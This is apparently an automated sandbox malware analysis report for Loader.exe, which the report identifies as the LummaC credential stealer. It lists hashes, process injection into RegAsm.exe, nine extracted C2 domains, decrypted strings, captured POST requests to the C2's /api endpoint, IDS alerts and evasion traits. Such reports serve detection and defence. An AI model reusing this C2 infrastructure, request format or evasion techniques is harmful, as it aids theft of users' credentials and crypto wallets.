Edit tour

Windows Analysis Report
Loader.exe

Overview

General Information

Sample name:	Loader.exe
Analysis ID:	1501451
MD5:	c7acff9e420db036ab543e95341b8c8b
SHA1:	de57cdf8ddcf91a4dcd617a7e7690dd1127b6a5e
SHA256:	dc644e8bfff8121042290307780d3b756f81beae58b452aada89033009883113
Tags:	exe
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

.NET source code contains very large array initializations

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Injects a PE file into a foreign processes

LummaC encrypted strings found

Sample uses string decryption to hide its real strings

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

Loader.exe (PID: 6772 cmdline: "C:\Users\user\Desktop\Loader.exe" MD5: C7ACFF9E420DB036AB543E95341B8C8B)

conhost.exe (PID: 6716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 4308 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

WerFault.exe (PID: 180 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4308 -s 1768 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/ https://censys.com/a-beginners-guide-to-hunting-open-directories/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["locatedblsoqp.shop", "traineiwnqo.shop", "evoliutwoqm.shop", "caffegclasiqwp.shop", "stamppreewntnq.shop", "stagedchheiqwo.shop", "froytnewqowv.shop", "condedqpwqm.shop", "millyscroqwp.shop"], "Build id": "yau6Na--503322905"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET MALWARE Lumma Stealer Domain in TLS SNI (froytnewqowv .shop) - Source IP: 192.168.2.5 - Destination IP: 188.114.97.3

Timestamp:	2024-08-29T23:43:00.286382+0200
SID:	2055488
Severity:	1
Source Port:	49704
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in TLS SNI (froytnewqowv .shop) - Source IP: 192.168.2.5 - Destination IP: 188.114.97.3

Timestamp:	2024-08-29T23:43:01.050251+0200
SID:	2055488
Severity:	1
Source Port:	49705
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Related Activity M2 - Source IP: 192.168.2.5 - Destination IP: 188.114.97.3

Timestamp:	2024-08-29T23:43:01.536679+0200
SID:	2049812
Severity:	1
Source Port:	49705
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.5 - Destination IP: 188.114.97.3

Timestamp:	2024-08-29T23:43:01.536679+0200
SID:	2054653
Severity:	1
Source Port:	49705
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Related Activity - Source IP: 192.168.2.5 - Destination IP: 188.114.97.3

Timestamp:	2024-08-29T23:43:00.467801+0200
SID:	2049836
Severity:	1
Source Port:	49704
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.5 - Destination IP: 188.114.97.3

Timestamp:	2024-08-29T23:43:00.467801+0200
SID:	2054653
Severity:	1
Source Port:	49704
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in DNS Lookup (froytnewqowv .shop) - Source IP: 192.168.2.5 - Destination IP: 1.1.1.1

Timestamp:	2024-08-29T23:42:59.777044+0200
SID:	2055478
Severity:	1
Source Port:	53799
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Loader.exe

Avira: detected

Antivirus detection for URL or domain

Source: stamppreewntnq.shop	Avira URL Cloud: Label: phishing
Source: froytnewqowv.shop	Avira URL Cloud: Label: phishing
Source: https://froytnewqowv.shop/apiMf	Avira URL Cloud: Label: phishing
Source: https://froytnewqowv.shop/	Avira URL Cloud: Label: phishing
Source: https://froytnewqowv.shop:443/api	Avira URL Cloud: Label: phishing
Source: https://froytnewqowv.shop/b.y	Avira URL Cloud: Label: phishing
Source: https://froytnewqowv.shop/5	Avira URL Cloud: Label: phishing
Source: https://froytnewqowv.shop/api	Avira URL Cloud: Label: malware
Source: condedqpwqm.shop	Avira URL Cloud: Label: phishing
Source: locatedblsoqp.shop	Avira URL Cloud: Label: phishing
Source: millyscroqwp.shop	Avira URL Cloud: Label: malware
Source: caffegclasiqwp.shop	Avira URL Cloud: Label: malware
Source: traineiwnqo.shop	Avira URL Cloud: Label: malware
Source: stagedchheiqwo.shop	Avira URL Cloud: Label: phishing

Found malware configuration

Source: 2.2.RegAsm.exe.400000.0.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["locatedblsoqp.shop", "traineiwnqo.shop", "evoliutwoqm.shop", "caffegclasiqwp.shop", "stamppreewntnq.shop", "stagedchheiqwo.shop", "froytnewqowv.shop", "condedqpwqm.shop", "millyscroqwp.shop"], "Build id": "yau6Na--503322905"}

Multi AV Scanner detection for submitted file

Source: Loader.exe

ReversingLabs: Detection: 52%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Sample uses string decryption to hide its real strings

Source: 2.2.RegAsm.exe.400000.0.unpack	String decryptor: caffegclasiqwp.shop
Source: 2.2.RegAsm.exe.400000.0.unpack	String decryptor: stamppreewntnq.shop
Source: 2.2.RegAsm.exe.400000.0.unpack	String decryptor: stagedchheiqwo.shop
Source: 2.2.RegAsm.exe.400000.0.unpack	String decryptor: millyscroqwp.shop
Source: 2.2.RegAsm.exe.400000.0.unpack	String decryptor: evoliutwoqm.shop
Source: 2.2.RegAsm.exe.400000.0.unpack	String decryptor: condedqpwqm.shop
Source: 2.2.RegAsm.exe.400000.0.unpack	String decryptor: traineiwnqo.shop
Source: 2.2.RegAsm.exe.400000.0.unpack	String decryptor: locatedblsoqp.shop
Source: 2.2.RegAsm.exe.400000.0.unpack	String decryptor: froytnewqowv.shop
Source: 2.2.RegAsm.exe.400000.0.unpack	String decryptor: lid=%s&j=%s&ver=4.0
Source: 2.2.RegAsm.exe.400000.0.unpack	String decryptor: TeslaBrowser/5.5
Source: 2.2.RegAsm.exe.400000.0.unpack	String decryptor: - Screen Resoluton:
Source: 2.2.RegAsm.exe.400000.0.unpack	String decryptor: - Physical Installed Memory:
Source: 2.2.RegAsm.exe.400000.0.unpack	String decryptor: Workgroup: -
Source: 2.2.RegAsm.exe.400000.0.unpack	String decryptor: yau6Na--503322905

Source: Loader.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49705 version: TLS 1.2

Source: Loader.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: c:\wkm1f0mk4\obj\Re\ease\fsB.pdb source: Loader.exe
Source:	Binary string: c:\wkm1f0mk4\obj\Re\ease\fsB.pdb0 source: Loader.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+1Ch]	2_2_0040C000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp]	2_2_0040B810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-14h]	2_2_0043BC78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, dword ptr [esp]	2_2_0040CC80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, dword ptr [esp]	2_2_0040C69D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	2_2_00413846
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+00000874h]	2_2_0041E850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [edx], cx	2_2_0041E850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [edx], cx	2_2_0041F862
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edi, dword ptr [edx+ebx+3Ch]	2_2_0043A830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx eax, word ptr [esi+ecx]	2_2_004390C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp]	2_2_0043E8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	2_2_0043E080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	2_2_00413888
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [edx], cx	2_2_0041F8B7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	2_2_0041F8B7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp]	2_2_0041D940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	2_2_00431950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ecx], al	2_2_00415172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ecx], al	2_2_00415172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-24h]	2_2_00415172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx eax, word ptr [ebx]	2_2_0043F9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+esi*8], 625B6034h	2_2_004211B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov dword ptr [esp], 00000000h	2_2_00413A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esi+000000D8h]	2_2_0042A2DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+34h]	2_2_0042A2DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+34h]	2_2_0042A2DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esi+18h]	2_2_0042A2DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh	2_2_0042A2DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	2_2_004122E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h	2_2_0043F290
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	2_2_00427B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_00423BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [ecx], ax	2_2_0041DBEA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	2_2_0043E390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	2_2_0043D470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	2_2_0043DC70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	2_2_0041C400
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, dword ptr [ebp-10h]	2_2_0041E411
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	2_2_004104D1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+38h]	2_2_0040F578
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp edx	2_2_0041CDED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [ebx+01h], 00000000h	2_2_0041CDED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	2_2_00424640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_0041C660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	2_2_00415E62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esi+000000D8h]	2_2_0042866E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	2_2_00403E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+00000874h]	2_2_0041E6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [edx], cx	2_2_0041E6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_00423F07
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	2_2_0043DF90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp edx	2_2_0043A796

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2055478 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (froytnewqowv .shop) : 192.168.2.5:53799 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2055488 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (froytnewqowv .shop) : 192.168.2.5:49704 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2055488 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (froytnewqowv .shop) : 192.168.2.5:49705 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49704 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49705 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49704 -> 188.114.97.3:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: locatedblsoqp.shop
Source: Malware configuration extractor	URLs: traineiwnqo.shop
Source: Malware configuration extractor	URLs: evoliutwoqm.shop
Source: Malware configuration extractor	URLs: caffegclasiqwp.shop
Source: Malware configuration extractor	URLs: stamppreewntnq.shop
Source: Malware configuration extractor	URLs: stagedchheiqwo.shop
Source: Malware configuration extractor	URLs: froytnewqowv.shop
Source: Malware configuration extractor	URLs: condedqpwqm.shop
Source: Malware configuration extractor	URLs: millyscroqwp.shop

Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: froytnewqowv.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=WPsWM85KukmjMUsre4jDC_vkIYPgT8CkFWdcUGh8ipk-1724967780-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 51Host: froytnewqowv.shop

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: froytnewqowv.shop

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: froytnewqowv.shop

Source: Amcache.hve.6.dr	String found in binary or memory: http://upx.sf.net
Source: RegAsm.exe, 00000002.00000002.2208570206.0000000001042000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2208570206.000000000104F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://froytnewqowv.shop/
Source: RegAsm.exe, 00000002.00000002.2208570206.000000000104F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://froytnewqowv.shop/5
Source: RegAsm.exe, 00000002.00000002.2208570206.000000000102F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2208570206.000000000100A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://froytnewqowv.shop/api
Source: RegAsm.exe, 00000002.00000002.2208570206.000000000102F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://froytnewqowv.shop/apiMf
Source: RegAsm.exe, 00000002.00000002.2208570206.000000000100A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://froytnewqowv.shop/b.y
Source: RegAsm.exe, 00000002.00000002.2208570206.0000000001066000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://froytnewqowv.shop:443/api

Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49705 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_00431530 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

2_2_00431530

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_00431530 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

2_2_00431530

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_00425380 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,

2_2_00425380

System Summary

.NET source code contains very large array initializations

Source: Loader.exe, MoveAngles.cs

Large array initialization: MoveAngles: array initializer size 308224

Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_01530B20	0_2_01530B20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0043681D	2_2_0043681D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040CC80	2_2_0040CC80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040C69D	2_2_0040C69D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041E850	2_2_0041E850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0043B050	2_2_0043B050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0042D056	2_2_0042D056
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0042285E	2_2_0042285E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00408870	2_2_00408870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00409810	2_2_00409810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00430035	2_2_00430035
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0042E8D7	2_2_0042E8D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0043E080	2_2_0043E080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004020AD	2_2_004020AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041F8B7	2_2_0041F8B7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00436150	2_2_00436150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00420970	2_2_00420970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00415172	2_2_00415172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0043F9E0	2_2_0043F9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0042D9EB	2_2_0042D9EB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00408190	2_2_00408190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0043D9AD	2_2_0043D9AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004211B0	2_2_004211B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0042C9B7	2_2_0042C9B7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00405A40	2_2_00405A40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00429A49	2_2_00429A49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00426206	2_2_00426206
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0042BADA	2_2_0042BADA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0042A2DC	2_2_0042A2DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004122E6	2_2_004122E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0042E2AC	2_2_0042E2AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00420360	2_2_00420360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00411B6E	2_2_00411B6E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00424B70	2_2_00424B70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00401330	2_2_00401330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00427B30	2_2_00427B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004323DD	2_2_004323DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004063E0	2_2_004063E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00407B80	2_2_00407B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040DB90	2_2_0040DB90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0043E390	2_2_0043E390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00425B9D	2_2_00425B9D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004223B5	2_2_004223B5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0043DC70	2_2_0043DC70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00404C20	2_2_00404C20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0042F4C7	2_2_0042F4C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040D4D0	2_2_0040D4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00435CD0	2_2_00435CD0
